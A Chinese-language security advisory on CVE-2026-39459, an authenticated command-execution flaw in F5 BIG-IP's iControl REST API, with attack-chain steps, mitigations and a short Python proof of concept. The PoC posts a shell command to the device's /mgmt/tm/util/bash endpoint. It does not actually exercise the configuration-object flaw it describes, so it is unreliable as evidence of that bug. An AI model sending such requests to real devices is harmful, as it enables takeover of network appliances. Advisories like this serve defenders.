CVE-2026-39459 CVSS 7.2 高危

CVE-2026-39459 F5 BIG-IP远程代码执行漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39459

漏洞类型

远程代码执行 (RCE)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

该漏洞存在于 F5 BIG-IP 的 iControl REST 和 TMOS Shell (tmsh) 组件中。拥有 Manager 角色或更高权限的经过身份验证的攻击者，可以通过创建特定的配置对象来执行任意系统命令。这可能导致攻击者完全控制受影响的设备，造成敏感数据泄露、系统配置被篡改或服务中断。该漏洞要求攻击者具备高权限访问能力，但一旦利用成功，后果严重。

技术细节

该漏洞的根源在于 F5 BIG-IP 的 iControl REST 接口与 TMOS Shell (tmsh) 在处理配置对象创建操作时，存在输入验证不严格的问题。攻击者必须具备至少 Manager 角色的认证权限。利用过程通常涉及通过 iControl REST API 发送特制的 POST 请求，在系统中创建恶意的配置对象（例如利用特定脚本扩展名或配置参数）。由于系统未对传入的配置内容进行充分的净化或沙箱隔离，攻击者可以在对象定义中注入操作系统命令。当系统解析并应用这些配置时，恶意命令将在后端以高权限（通常是 root 或系统级权限）执行。这种利用方式绕过了正常的应用层安全检查，直接在操作系统层面执行代码，导致攻击者能够读取敏感文件、安装后门或破坏系统服务。

攻击链分析

STEP 1

侦察

攻击者识别目标为 F5 BIG-IP 设备，并确定 iControl REST 服务可访问。

STEP 2

初始访问

攻击者获取具有至少 Manager 角色权限的合法账户凭证（高权限认证要求）。

STEP 3

利用

攻击者通过 iControl REST API 发送特制的恶意请求，创建能够执行任意命令的配置对象。

STEP 4

执行

系统处理该恶意配置对象，导致攻击者注入的命令在底层操作系统上以高权限运行。

STEP 5

影响达成

攻击者获得系统控制权，可以窃取数据、破坏完整性或导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target F5 BIG-IP iControl REST API
# Note: This is a conceptual PoC. The exact endpoint may vary.
target_url = "https://<TARGET_IP>/mgmt/tm/util/bash"
auth = ("<USERNAME>", "<PASSWORD>")

# Payload to execute arbitrary command (e.g., 'id')
# The vulnerability allows creating config objects that run commands.
payload = {
    "command": "run",
    "utilCmdArgs": "-c 'id'"
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Send the request to the vulnerable endpoint
    response = requests.post(target_url, auth=auth, headers=headers, data=json.dumps(payload), verify=False)
    
    if response.status_code == 200:
        print("[+] Command executed successfully:")
        print(response.text)
    else:
        print(f"[-] Failed to execute command. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

F5 BIG-IP (具体受影响版本请参考官方通告 K000160863)

防御指南

临时缓解措施

在未安装补丁前，建议立即限制 iControl REST 接口的访问权限，仅允许受信任的 IP 地址连接。同时，严格审查并限制拥有 Manager 角色的账户数量，确保仅授权管理员拥有该权限。应密切监控设备的配置变更日志和系统日志，以发现潜在的异常利用行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-39459
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-39459
3 Details https://www.cvedetails.com/cve/CVE-2026-39459/
4 VulDB https://vuldb.com/cve/CVE-2026-39459
5 Link https://my.f5.com/manage/s/article/K000160863

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表